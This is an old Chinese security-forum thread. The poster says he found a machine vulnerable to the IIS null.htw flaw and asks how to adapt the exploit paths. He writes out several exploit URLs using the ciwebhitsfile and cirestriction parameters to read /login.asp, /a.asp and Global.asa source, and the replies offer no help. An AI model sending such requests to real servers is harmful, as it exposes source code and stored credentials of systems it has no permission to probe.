论坛: 菜鸟乐园 标题: 遇到了null.htw的困难,请大家指点一下 复制本贴地址    
作者: mmzcx [mmzcx]    论坛用户   登录
遇到了null.htw的困难,请大家指点一下
看----null.htw 最新利用一文之后,没想到还真找到了一个存在这个漏洞的机子
但是遇到了这些困难,请大家指点一下


查查null.htw都会得到这些内容 http://ip/null.htwciwebhitsfile=/login.asp20&cirestriction=";"&cihilitetype=full
/login.asp 从/开始算起
eg: www.xxx.com/a/a.asp ----(/login.asp ,而那个网页是reg.asp,这样对其他有影响吧?那怎么改呢?我菜,不知道这样说对不对)(其他对应的也能帮我指出好吗.谢谢)

那就把/login.asp改成/a/a.asp http://ip/null.htw?ciwebhitsfile=/a.asp%20&cirestriction=";"&cihilitetype=full http://ip/null.htw?ciwebhitsfile=/Global.asa%20&cirestriction=";"&cihilitetype=full



地主 发表时间: 04-01-14 13:44

回复: mmzcx [mmzcx]   论坛用户   登录
大家帮我好吗

B1层 发表时间: 04-01-14 18:47

回复: ka [ka]   论坛用户   登录
我菜,帮你顶一下吧。

B2层 发表时间: 04-01-14 19:14

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号